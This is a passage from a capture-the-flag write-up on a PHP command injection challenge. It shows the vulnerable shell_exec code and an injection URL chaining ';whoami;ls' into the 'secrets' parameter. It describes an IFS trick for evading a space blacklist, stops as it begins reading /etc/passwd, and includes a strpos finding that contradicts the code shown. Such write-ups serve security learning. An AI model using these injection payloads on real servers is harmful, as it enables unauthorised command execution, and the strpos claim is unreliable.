Challenge Description

I think my blacklist is going to prevent any vulnerability!

Flag format: CTF{sha256}

Flag proof

CTF{3b2ceb0403300535fcd4808e8cbdb3cc3bd8f8b674527adce2915467f182faa4}

Summary

Use the IFS=] trick to bypass the space remover and then cat the secrets.php file to see the flag show up in the source code of the page.

Details

After visiting the website, we get the following PHP code:

<?php
require __DIR__ . '/secrets.php';
if (!isset($_GET['start'])){
    show_source(__FILE__);
    exit;
} 

$value = $_GET['secrets'];
if (strpos($value, ' ') !== false) {
  exit;
}

$cmd = "/usr/bin/find . ".$value;
echo shell_exec($cmd);

?>

Findings:

• strpos() is vulnerable, it’s used with == instead of ===

https://bugs.php.net/bug.php?id=76671

• You can run commands by giving them as parameter to “secrets”:

http://35.246.158.241:32219/?start=1&secrets=;whoami;ls

After running the 'ls' command, we notice that we have a secrets.php file.

• Space is not allowed in the “secrets” parameter.

The webserver runs: /usr/bin/find . <secrets-value>

We have secrets.php in the current dir, that probably contains the flag.

We use the IFS=] trick to bypass the server removing the space key. We try to cat /etc/passwd: